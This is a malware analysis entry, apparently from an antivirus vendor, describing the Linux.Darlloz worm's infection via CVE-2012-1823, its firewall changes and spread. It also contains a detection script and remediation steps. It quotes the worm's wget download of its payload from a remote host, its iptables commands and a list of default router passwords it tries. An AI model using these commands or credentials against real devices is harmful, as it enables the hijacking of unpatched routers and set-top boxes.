Linux.Darlloz is a worm targeting Linux-based devices. As flavours of this malware exist for embedded devices, it is possible (though not confirmed) that it targets Linux-based embedded devices such as Internet of Things devices.
The worm infects hosts through a PHP vulnerability (CVE-2012-1823). This vulnerability was patched a long time ago, but some old devices that have not been updated might still be vulnerable. The vulnerability allows attackers to run arbitrary PHP code on the affected machine.
The attackers have vulnerable hosts download a copy of the worm from a remote server:
wget -O /tmp/x86 http://www.[CENSORED]n.de/solar/x86
The sample is then made executable (chmod +x).
Although many samples only download x86 versions of the malware, some samples also download files for different architectures: arm, ppc, mips, mipsel and x86.
The malware loads the ip_tables kernel modules:
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
It then re-creates a firewall rule (deleting any existing copy first, then adding it back) to make sure telnet connections to the infected device are dropped:
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
The worm also tries to terminate the telnetd process. Finally, the worm scans other devices on the network and tries to connect to them using the same PHP exploit. If necessary, it supplies one of the following default username/password pairs:
- admin/admin
- root/[BLANK]
- root/root
- admin/1234
- admin/12345
- root/admin
- root/dreambox
- admin/smcadmin
- admin/[BLANK]
Based on these default user id / password credentials, we guess that the malware particularly targets SMC ADSL routers (Barricade7204BRB and WHSG44G), but also Dreamboxes (TV/satellite reception boxes).
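The host-side traces described above (the payload dropped in /tmp, the added iptables rule on port 23, the missing telnetd) can be checked from pre-collected device state. The following is an added example written for this write-up, not Fortinet's or the worm's code; it assumes rules are supplied in `iptables -S` output form and that non-x86 payloads land in /tmp under their architecture name.

```python
import shlex
from typing import List

# Indicators taken from the write-up above: the worm's download target in /tmp,
# the firewall rule it adds, and the telnetd process it tries to kill.
# Assumption: non-x86 payloads are saved as /tmp/<arch>, like the x86 one.
PAYLOAD_NAMES = {"x86", "arm", "ppc", "mips", "mipsel"}


def is_telnet_drop_rule(rule: str) -> bool:
    """True if an `iptables -S` line drops inbound TCP port 23.

    Tokens are parsed as option/value pairs so extra matches such as
    `-m tcp` do not hide the rule.
    """
    toks = shlex.split(rule)
    opts = {}
    for i, tok in enumerate(toks):
        if tok.startswith("-") and i + 1 < len(toks):
            opts[tok] = toks[i + 1]
    return (opts.get("-A") == "INPUT" and opts.get("-p") == "tcp"
            and opts.get("--dport") == "23" and opts.get("-j") == "DROP")


def scan(iptables_rules: List[str], tmp_files: List[str], procs: List[str],
         telnetd_expected: bool = True) -> List[str]:
    """Return Darlloz-style findings from already-collected host state."""
    findings = []
    for rule in iptables_rules:
        if is_telnet_drop_rule(rule):
            findings.append("iptables drops inbound telnet: " + rule)
    for path in tmp_files:
        if path.startswith("/tmp/") and path[len("/tmp/"):] in PAYLOAD_NAMES:
            findings.append("suspicious payload file: " + path)
    if telnetd_expected and "telnetd" not in procs:
        findings.append("telnetd not running on a device that normally runs it")
    return findings


# Constructed sample host state (not captured from a real infection).
SAMPLE_RULES = ["-P INPUT ACCEPT",
                "-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT",
                "-A INPUT -p tcp -m tcp --dport 23 -j DROP"]
SAMPLE_TMP = ["/tmp/x86", "/tmp/sess_ab12"]
SAMPLE_PROCS = ["init", "httpd", "php-cgi"]

if __name__ == "__main__":
    for finding in scan(SAMPLE_RULES, SAMPLE_TMP, SAMPLE_PROCS):
        print("[!]", finding)
```

On a live device the three inputs would come from `iptables -S INPUT`, `ls /tmp` and `ps`; the sample state above yields three findings.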
- Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
- Quarantine/delete files that are detected and replace infected files with clean backup copies.